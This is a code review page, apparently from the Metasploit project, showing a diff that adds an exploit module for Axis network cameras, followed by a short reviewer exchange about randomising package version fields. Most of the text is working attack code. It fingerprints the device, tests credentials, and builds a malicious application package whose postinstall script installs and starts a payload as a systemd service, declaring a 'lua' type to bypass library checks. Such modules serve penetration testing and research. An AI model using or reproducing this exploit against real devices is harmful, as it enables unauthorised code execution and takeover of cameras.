modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+  #
+  def check
+    # grab the brand/model. Shouldn't require authentication.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')
+    })
+
+    return CheckCode::Unknown unless res && (res.code == 200)
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+
+    # The brand / model are now known
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
+
+    # check to see if the applications api exists (also tests credentials)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')
+    })
+
+    # A strange edge case where there is no response... respond detected
+    return CheckCode::Detected unless res
+    # Respond safe if credentials fail, to prevent the exploit from running
+    return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401
+    # Assume any non-200 means the API doesn't exist
+    return CheckCode::Safe(check_comment) if res.code != 200
+
+    # This checks for an XML response which I'm not sure is smart considering most of the device
+    # does JSON replies... the concerning being that this response has changed in newer models
+    return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">') != 200
+
+    CheckCode::Appears(check_comment)
+  end
+
+  # Creates a malicious "eap" application. The package application will gain execution
+  # through the postinstall script. The script, which executes as a systemd oneshot, will
+  # create and execute a new service for the payload. We have to d this because the oneshot
+  # child processes will be reaped when the main binary exits. Executing the payload from
+  # a new service gets around that issue.
+  #
+  # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked
+  # for some required libraries whereas the lua version is just accepted.
+  #
+  # The construction of the eap follows this pattern:
+  # * tar -cf exploit payload package.conf postinstall.sh payload.service
+  # * gzip exploit
+  # * mv exploit.gz exploit.eap
+  def create_eap(payload, appname)
+    print_status("Creating an application package named: #{appname}")
+    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
+
+    package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \
+      "APPTYPE='lua'\n" \
+      "APPNAME='#{appname}'\n" \
+      "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \
+      "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
```

Comment:
Know this is odd to ask but any possibility one can do ranges of say 1 to 3 numbers for something like the micro version? Or are these fields all strictly 1 byte long?

Reply:
I have my doubts that using more or less randomization in a module is actually important. But you asked, so I altered minor to 1..2 and micro to 1..3.

Reply:
Its a fair point however I have seen reviews from coworkers mentioning it in the past so thought I'd bring it up. Ideally we want to make it as random as possible and this has always been a goal that our modules try to achieve, however to your credit I can also understand your point that in this particular scenario its not adding that much extra randomness.